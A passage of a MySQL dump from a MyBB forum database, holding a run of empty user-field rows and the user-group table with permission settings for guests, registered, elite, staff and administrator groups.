(`ufid`) VALUES ('127'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('128'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('129'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('130'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('131'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('132'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('133'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('134'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('135'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('136'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('137'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('138'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('139'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('141'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('142'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('143'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('144'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('145'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('146'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('147'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('148'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('149'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('150'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('151'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('152'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('153'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('154'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('155'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('156'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('157'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('158'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('159'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('160'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('161'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('162'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('163'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('164'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('165'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('166'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('167'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('168'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('169'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('170'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('171'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('172'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('173'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('174'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('175'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('176'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('177'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('178'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('179'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('180'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('181'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('182'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('183'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('184'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('185'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('187'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('188'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('189'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('190'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('191'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('192'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('193'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('194'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('195'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('196'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('197'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('198'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('199'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('200'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('201'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('202'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('203'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('204'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('205'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('206'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('207'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('208'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('209'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('210'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('211'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('212'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('213'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('214'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('215'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('216'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('217'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('218'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('219'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('220'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('221'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('222'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('223'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('224'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('225'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('226'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('227'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('228'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('229'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('230'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('231'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('232'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('233'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('234'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('235'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('236'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('237'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('238'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('239'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('240'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('241'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('242'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('243'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('244'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('245'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('247'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('248'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('249'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('250'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('251'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('252'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('253'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('254'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('255'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('256'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('257'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('258'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('259'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('260'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('261'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('262'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('263'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('264'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('265'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('266'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('267'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('268'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('269'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('270'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('271'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('272'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('273'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('274'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('275'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('276'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('277'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('278'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('279'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('280'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('281'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('282'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('283'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('284'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('285'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('286'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('287'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('288'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('289'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('290'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('291'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('292'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('293'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('294'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('295'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('296'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('297'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('298'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('299'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('300'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('301'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('302'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('303'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('304'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('305'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('306'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('307'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('308'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('309'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('310'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('311'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('312'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('313'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('314'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('315'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('316'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('318'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('319'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('320'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('321'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('322'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('323'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('324'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('325'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('326'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('327'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('328'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('329'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('330'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('331'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('332'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('333'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('334'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('335'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('336'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('337'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('338'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('339'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('340'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('341'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('342'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('343'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('344'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('345'); INSERT INTO `mybb_userfields` (`ufid`) VALUES ('346'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_usergroups`; CREATE TABLE `mybb_usergroups` ( `gid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `type` smallint(2) NOT NULL DEFAULT '2', `title` varchar(120) NOT NULL DEFAULT '', `description` text NOT NULL, `namestyle` varchar(200) NOT NULL DEFAULT '{username}', `usertitle` varchar(120) NOT NULL DEFAULT '', `stars` smallint(4) NOT NULL DEFAULT '0', `starimage` varchar(120) NOT NULL DEFAULT '', `image` varchar(120) NOT NULL DEFAULT '', `disporder` smallint(6) unsigned NOT NULL, `isbannedgroup` int(1) NOT NULL DEFAULT '0', `canview` int(1) NOT NULL DEFAULT '0', `canviewthreads` int(1) NOT NULL DEFAULT '0', `canviewprofiles` int(1) NOT NULL DEFAULT '0', `candlattachments` int(1) NOT NULL DEFAULT '0', `canpostthreads` int(1) NOT NULL DEFAULT '0', `canpostreplys` int(1) NOT NULL DEFAULT '0', `canpostattachments` int(1) NOT NULL DEFAULT '0', `canratethreads` int(1) NOT NULL DEFAULT '0', `caneditposts` int(1) NOT NULL DEFAULT '0', `candeleteposts` int(1) NOT NULL DEFAULT '0', `candeletethreads` int(1) NOT NULL DEFAULT '0', `caneditattachments` int(1) NOT NULL DEFAULT '0', `canpostpolls` int(1) NOT NULL DEFAULT '0', `canvotepolls` int(1) NOT NULL DEFAULT '0', `canundovotes` int(1) NOT NULL DEFAULT '0', `canusepms` int(1) NOT NULL DEFAULT '0', `cansendpms` int(1) NOT NULL DEFAULT '0', `cantrackpms` int(1) NOT NULL DEFAULT '0', `candenypmreceipts` int(1) NOT NULL DEFAULT '0', `pmquota` int(3) NOT NULL DEFAULT '0', `maxpmrecipients` int(4) NOT NULL DEFAULT '5', `cansendemail` int(1) NOT NULL DEFAULT '0', `cansendemailoverride` int(1) NOT NULL DEFAULT '0', `maxemails` int(3) NOT NULL DEFAULT '5', `canviewmemberlist` int(1) NOT NULL DEFAULT '0', `canviewcalendar` int(1) NOT NULL DEFAULT '0', `canaddevents` int(1) NOT NULL DEFAULT '0', `canbypasseventmod` int(1) NOT NULL DEFAULT '0', `canmoderateevents` int(1) NOT NULL DEFAULT '0', `canviewonline` int(1) NOT NULL DEFAULT '0', `canviewwolinvis` int(1) NOT NULL DEFAULT '0', `canviewonlineips` int(1) NOT NULL DEFAULT '0', `cancp` int(1) NOT NULL DEFAULT '0', `issupermod` int(1) NOT NULL DEFAULT '0', `cansearch` int(1) NOT NULL DEFAULT '0', `canusercp` int(1) NOT NULL DEFAULT '0', `canuploadavatars` int(1) NOT NULL DEFAULT '0', `canratemembers` int(1) NOT NULL DEFAULT '0', `canchangename` int(1) NOT NULL DEFAULT '0', `showforumteam` int(1) NOT NULL DEFAULT '0', `usereputationsystem` int(1) NOT NULL DEFAULT '0', `cangivereputations` int(1) NOT NULL DEFAULT '0', `reputationpower` bigint(30) NOT NULL DEFAULT '0', `maxreputationsday` bigint(30) NOT NULL DEFAULT '0', `maxreputationsperuser` bigint(30) NOT NULL DEFAULT '0', `maxreputationsperthread` bigint(30) NOT NULL DEFAULT '0', `candisplaygroup` int(1) NOT NULL DEFAULT '0', `attachquota` bigint(30) NOT NULL DEFAULT '0', `cancustomtitle` int(1) NOT NULL DEFAULT '0', `canwarnusers` int(1) NOT NULL DEFAULT '0', `canreceivewarnings` int(1) NOT NULL DEFAULT '0', `maxwarningsday` int(3) NOT NULL DEFAULT '3', `canmodcp` int(1) NOT NULL DEFAULT '0', `showinbirthdaylist` int(1) NOT NULL DEFAULT '0', `canoverridepm` int(1) NOT NULL DEFAULT '0', `canusesig` int(1) NOT NULL DEFAULT '0', `canusesigxposts` bigint(30) NOT NULL DEFAULT '0', `signofollow` int(1) NOT NULL DEFAULT '0', `timebtwnthreads` int(10) NOT NULL, `timebtwnposts` int(10) NOT NULL, `canremoveeditedby` int(1) NOT NULL DEFAULT '0', `edittimelimit` int(3) NOT NULL DEFAULT '0', PRIMARY KEY (`gid`) ) ENGINE=MyISAM AUTO_INCREMENT=22 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_usergroups` WRITE; INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('1', '1', 'Guests', 'The default group that all visitors are assigned to unless they\'re logged in.', '{username}', 'Unregistered', '0', '', '', '0', '0', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '5', '0', '0', '5', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('2', '1', 'Registered', 'After registration, all users are placed in this group by default.', '<span style=\"color: grey;\">{username}</span>', '', '0', 'images/stars/yellow.png', '', '3', '0', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '0', '5', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '20', '30', '0', '2880'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('9', '2', 'Elite ', 'Elite; Upgraded members group', '<span style=\"color: orange;\"><strong>{username}</strong></span>', 'Elite Member!', '7', 'images/stars/orange.png', './images/ub/elite1.png', '4', '0', '1', '1', '1', '1', '1', '1', '1', '0', '1', '1', '0', '1', '1', '1', '0', '1', '1', '1', '0', '1000', '3', '1', '0', '4', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '1', '0', '1', '1', '3', '4', '0', '0', '1', '500', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '20', '30', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('3', '1', 'Staff', 'These users can moderate any forum.', '<span style=\"color: green;\"><strong>{username}</strong></span>', 'Super Moderator', '8', 'images/stars/purple.gif', './images/ub/staffit.png', '6', '0', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '0', '1', '1', '1', '1', '1', '1', '1', '1', '3000', '5', '0', '0', '10', '1', '0', '0', '0', '0', '1', '1', '1', '0', '1', '1', '1', '1', '1', '1', '1', '1', '1', '6', '8', '0', '0', '1', '0', '1', '1', '1', '3', '1', '0', '1', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('4', '1', 'Administrators', 'The group all administrators belong to.', '<span style=\"color: red;\"><strong><em>{username}</em></strong></span>', 'Administrator', '8', 'images/stars/red.gif', './images/ub/admin5.png', '7', '0', '1', '1', '1', '1', '1', '1', '1', '0', '1', '1', '0', '1', '1', '1', '1', '1', '1', '1', '1', '5000', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '10', '0', '0', '0', '1', '0', '1', '1', '1', '0', '1', '0', '1', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, `canreceivewarnings`, `maxwarningsday`, `canmodcp`, `showinbirthdaylist`, `canoverridepm`, `canusesig`, `canusesigxposts`, `signofollow`, `timebtwnthreads`, `timebtwnposts`, `canremoveeditedby`, `edittimelimit`) VALUES ('5', '1', 'Awaiting Activation', 'Users that have not activated their account by email or manually been activated yet.', '<span style=\"color: silver;\">{username}</span>', 'Account not Activated', '0', 'images/star.gif', '', '0', '0', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '20', '5', '0', '0', '5', '1', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_usergroups` (`gid`, `type`, `title`, `description`, `namestyle`, `usertitle`, `stars`, `starimage`, `image`, `disporder`, `isbannedgroup`, `canview`, `canviewthreads`, `canviewprofiles`, `candlattachments`, `canpostthreads`, `canpostreplys`, `canpostattachments`, `canratethreads`, `caneditposts`, `candeleteposts`, `candeletethreads`, `caneditattachments`, `canpostpolls`, `canvotepolls`, `canundovotes`, `canusepms`, `cansendpms`, `cantrackpms`, `candenypmreceipts`, `pmquota`, `maxpmrecipients`, `cansendemail`, `cansendemailoverride`, `maxemails`, `canviewmemberlist`, `canviewcalendar`, `canaddevents`, `canbypasseventmod`, `canmoderateevents`, `canviewonline`, `canviewwolinvis`, `canviewonlineips`, `cancp`, `issupermod`, `cansearch`, `canusercp`, `canuploadavatars`, `canratemembers`, `canchangename`, `showforumteam`, `usereputationsystem`, `cangivereputations`, `reputationpower`, `maxreputationsday`, `maxreputationsperuser`, `maxreputationsperthread`, `candisplaygroup`, `attachquota`, `cancustomtitle`, `canwarnusers`, 